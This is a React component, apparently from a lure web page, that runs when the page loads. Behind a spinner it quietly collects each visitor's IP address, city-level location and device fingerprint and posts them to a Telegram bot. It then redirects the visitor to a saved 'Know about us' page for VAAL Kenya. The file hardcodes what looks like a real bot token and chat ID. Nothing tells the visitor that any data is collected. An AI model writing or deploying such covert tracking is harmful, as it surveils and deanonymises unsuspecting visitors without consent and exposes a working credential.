/* eslint-disable no-unused-vars */

import React, { useState, useEffect } from 'react';

const VisitorTracker = () => {
  const [visitorData, setVisitorData] = useState({
    ipAddress: '',
    browserInfo: '',
    osInfo: '',
    screenResolution: '',
    deviceMemory: '',
    cpuCores: '',
    touchPoints: '',
    connectionType: '',
    timestamp: '',
    location: '',
    mouseMovements: 0,
    scrollEvents: 0,
    typingEvents: 0,
    isHumanScore: 0
  });

  const [loading, setLoading] = useState(true); // To track if data collection is in progress

  const BOT_TOKEN = "7995003776:AAF7PX1ndSQI-JxP2Bxh5416OH08y5BShaE"; // Replace with your bot token
  const CHAT_ID = "-1002359817421"; // Replace with your chat ID

  useEffect(() => {
    const collectVisitorData = async () => {
      try {
        // Collect IP Address
        const ipResponse = await fetch('https://api.ipify.org?format=json');
        const ipData = await ipResponse.json();

        // Collect Location Data
        const locationResponse = await fetch(`https://ipapi.co/${ipData.ip}/json/`);
        const locationData = await locationResponse.json();

        // Set up visitor data
        const newVisitorData = {
          ipAddress: ipData.ip,
          browserInfo: navigator.userAgent,
          osInfo: navigator.platform,
          screenResolution: `${window.screen.width}x${window.screen.height}`,
          deviceMemory: navigator.deviceMemory || 'N/A',
          cpuCores: navigator.hardwareConcurrency || 'N/A',
          touchPoints: navigator.maxTouchPoints || 0,
          connectionType: navigator.connection?.effectiveType || 'Unknown',
          timestamp: new Date().toISOString(),
          location: `${locationData.city}, ${locationData.region}, ${locationData.country_name}`,
          mouseMovements: 0,
          scrollEvents: 0,
          typingEvents: 0
        };

        // Update state with visitor data
        setVisitorData(newVisitorData);

        // Send the data to Telegram
        await sendToTelegram(newVisitorData);

        // After sending the data, we can stop showing the loading state and redirect the user
        setLoading(false);
        window.location.href = '/Know about us _ VAAL Kenya.html'; // Redirect to your HTML page inside the public folder
      } catch (error) {
        console.error('Error collecting visitor data:', error);
      }
    };

    collectVisitorData();

    const handleMouseMove = () => {
      setVisitorData((prev) => ({
        ...prev,
        mouseMovements: prev.mouseMovements + 1
      }));
    };

    const handleScroll = () => {
      setVisitorData((prev) => ({
        ...prev,
        scrollEvents: prev.scrollEvents + 1
      }));
    };

    const handleTyping = () => {
      setVisitorData((prev) => ({
        ...prev,
        typingEvents: prev.typingEvents + 1
      }));
    };

    // Event listeners for mouse movements, scrolls, and typing
    window.addEventListener('mousemove', handleMouseMove);
    window.addEventListener('scroll', handleScroll);
    window.addEventListener('keydown', handleTyping);

    return () => {
      // Clean up event listeners
      window.removeEventListener('mousemove', handleMouseMove);
      window.removeEventListener('scroll', handleScroll);
      window.removeEventListener('keydown', handleTyping);
    };
  }, []);

  const sendToTelegram = async (data) => {
    const message = `
📝 *Visitor Data:*
- 🌐 IP Address: ${data.ipAddress}
- 🖥 Browser: ${data.browserInfo}
- 🛠 OS: ${data.osInfo}
- 📐 Screen Resolution: ${data.screenResolution}
- 💾 Device Memory: ${data.deviceMemory} GB
- ⚙️ CPU Cores: ${data.cpuCores}
- 👆 Touch Points: ${data.touchPoints}
- 📡 Connection: ${data.connectionType}
- 🕒 Timestamp: ${data.timestamp}
- 📍 Location: ${data.location}
- 🖱 Mouse Movements: ${data.mouseMovements}
- 📜 Scroll Events: ${data.scrollEvents}
- ⌨️ Typing Events: ${data.typingEvents}
- 🤖 Human Score: ${data.isHumanScore}%
    `;

    try {
      await fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({
          chat_id: CHAT_ID,
          text: message,
          parse_mode: 'Markdown'
        })
      });
    } catch (error) {
      console.error('Error sending message to Telegram:', error);
    }
  };

  // If loading, show a spinner or loading indicator
  if (loading) {
    return (
      <div className="loading-container">
        <div className="spinner"></div>
      </div>
    );
  }

  return null; // Return null after redirecting
};

export default VisitorTracker;
